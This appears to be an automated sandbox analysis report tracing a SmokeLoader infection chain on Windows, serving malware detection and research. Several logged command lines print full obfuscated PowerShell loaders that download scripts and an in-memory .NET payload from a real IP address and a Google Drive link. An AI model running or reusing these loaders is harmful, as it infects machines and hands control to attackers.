                                                                                                                        Has exited:true

                                                                                                                        Target ID:1
                                                                                                                        Start time:02:14:36
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
                                                                                                                        Imagebase:0xcb0000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:02:14:36
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:02:14:37
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe
                                                                                                                        Imagebase:0xcb0000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:02:14:41
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"
                                                                                                                        Imagebase:0xf70000
                                                                                                                        File size:2'141'552 bytes
                                                                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:5
                                                                                                                        Start time:02:14:41
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"
                                                                                                                        Imagebase:0xf80000
                                                                                                                        File size:46'832 bytes
                                                                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:7
                                                                                                                        Start time:02:14:47
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"
                                                                                                                        Imagebase:0xad0000
                                                                                                                        File size:147'456 bytes
                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:8
                                                                                                                        Start time:02:14:48
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                        Imagebase:0xcb0000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:9
                                                                                                                        Start time:02:14:48
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:10
                                                                                                                        Start time:02:14:48
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
                                                                                                                        Imagebase:0xcb0000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:12
                                                                                                                        Start time:02:15:16
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                                                        Imagebase:0x180000
                                                                                                                        File size:46'112 bytes
                                                                                                                        MD5 hash:BB8B6B54FD50C08AB579B84BF07918CF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:13
                                                                                                                        Start time:02:15:16
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                                                        Imagebase:0x820000
                                                                                                                        File size:46'112 bytes
                                                                                                                        MD5 hash:BB8B6B54FD50C08AB579B84BF07918CF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Has exited:true

                                                                                                                        Target ID:14
                                                                                                                        Start time:02:15:21
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Has exited:false

                                                                                                                        Target ID:17
                                                                                                                        Start time:02:15:40
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Users\user\AppData\Roaming\wihaduv
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\wihaduv
                                                                                                                        Imagebase:0xc50000
                                                                                                                        File size:46'112 bytes
                                                                                                                        MD5 hash:BB8B6B54FD50C08AB579B84BF07918CF
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                        Has exited:true

                                                                                                                        Target ID:18
                                                                                                                        Start time:02:15:41
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:19
                                                                                                                        Start time:02:15:44
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Imagebase:0x330000
                                                                                                                        File size:4'514'184 bytes
                                                                                                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:20
                                                                                                                        Start time:02:15:45
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\explorer.exe
                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:21
                                                                                                                        Start time:02:15:46
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Imagebase:0x330000
                                                                                                                        File size:4'514'184 bytes
                                                                                                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:22
                                                                                                                        Start time:02:15:47
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Imagebase:0x330000
                                                                                                                        File size:4'514'184 bytes
                                                                                                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:false

                                                                                                                        Target ID:23
                                                                                                                        Start time:02:15:48
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\explorer.exe
                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:24
                                                                                                                        Start time:02:15:49
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Imagebase:0x330000
                                                                                                                        File size:4'514'184 bytes
                                                                                                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Has exited:false

                                                                                                                        Target ID:27
                                                                                                                        Start time:02:15:50
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 4232 -s 704
                                                                                                                        Imagebase:0x7ff777350000
                                                                                                                        File size:570'736 bytes
                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:28
                                                                                                                        Start time:02:15:50
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\explorer.exe
                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Has exited:false

                                                                                                                        Target ID:30
                                                                                                                        Start time:02:15:51
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        Imagebase:0x330000
                                                                                                                        File size:4'514'184 bytes
                                                                                                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:false

                                                                                                                        Target ID:31
                                                                                                                        Start time:02:15:52
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\explorer.exe
                                                                                                                        Imagebase:0x7ff609fd0000
                                                                                                                        File size:5'141'208 bytes
                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:false

                                                                                                                        Reset < >
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1298944289.0000000006670000.00000010.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_6670000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                          • Instruction ID: 089aa9e1d4ae3a40a28c89ebca15803daaf9fb05f738883e67c3ec47db9c8fa0
                                                                                                                          • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1298944289.0000000006670000.00000010.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_6670000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                          • Instruction ID: 089aa9e1d4ae3a40a28c89ebca15803daaf9fb05f738883e67c3ec47db9c8fa0
                                                                                                                          • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1298944289.0000000006670000.00000010.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_6670000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                          • Instruction ID: 089aa9e1d4ae3a40a28c89ebca15803daaf9fb05f738883e67c3ec47db9c8fa0
                                                                                                                          • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1442130310.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3170000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c61702e696fd3a2cc1212ea739ad6a0a47c4f8c22ef1ebb4f11205507c8b5371
                                                                                                                          • Instruction ID: 7f51831bc205572542d9cde069b948039697acaff18d5b31d30852e282e1877e
                                                                                                                          • Opcode Fuzzy Hash: c61702e696fd3a2cc1212ea739ad6a0a47c4f8c22ef1ebb4f11205507c8b5371
                                                                                                                          • Instruction Fuzzy Hash: 3F221974A00219AFDB05CF99D884A9EFBB2FF89310F298159E815AB351C775ED81CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1453383129.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 84Tj$84Tj$84Tj$84Tj$84Tj$84Tj
                                                                                                                          • API String ID: 0-126198043
